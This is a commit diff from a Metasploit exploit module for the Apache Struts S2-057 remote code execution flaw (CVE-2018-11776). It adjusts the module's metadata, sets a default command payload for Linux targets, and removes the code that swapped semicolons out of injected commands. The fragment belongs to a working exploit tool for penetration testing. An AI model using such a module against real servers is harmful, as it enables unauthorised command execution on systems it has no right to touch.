Make some small changes:
Changes made: * DisclosureDate * Privileged to false * Remove gsub for ';' * Set cmd/unix/generic as the default payload for ARCH_CMD (linux)GSoC/Meterpreter_Web_Console
parent
99ca6cef49
commit
bd50e00ccc
|
@ -37,7 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-057'],
|
||||
['URL', 'https://github.com/hook-s3c/CVE-2018-11776-Python-PoC'],
|
||||
],
|
||||
'Privileged' => true,
|
||||
'Privileged' => false,
|
||||
'Targets' => [
|
||||
[
|
||||
'Automatic detection', {
|
||||
|
@ -53,12 +53,13 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
],
|
||||
[
|
||||
'Linux', {
|
||||
'Platform' => %w{ unix linux },
|
||||
'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],
|
||||
'Platform' => %w{ unix linux },
|
||||
'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],
|
||||
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/generic'}
|
||||
},
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => 'Apr 10 2018',
|
||||
'DisclosureDate' => 'Aug 22 2018', # Private disclosure = Apr 10 2018
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
|
@ -282,13 +283,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
def execute_command(cmd_input, opts={})
|
||||
# Semicolons appear to be a bad character in OGNL. cmdstager doesn't understand that.
|
||||
# We'll replace ';' with '||' and hope for the best
|
||||
|
||||
if cmd_input.include? ';'
|
||||
print_error("WARNING: Command contains bad characters: semicolons (;). Substituting '||'")
|
||||
vprint_status("BEFORE: #{cmd_input}")
|
||||
cmd_input = cmd_input.gsub(";" ,"||")
|
||||
vprint_status("AFTER: #{cmd_input}")
|
||||
print_warning("WARNING: Command contains bad characters: semicolons (;).")
|
||||
end
|
||||
|
||||
begin
|
||||
|
@ -392,4 +388,3 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
|
Loading…
Reference in New Issue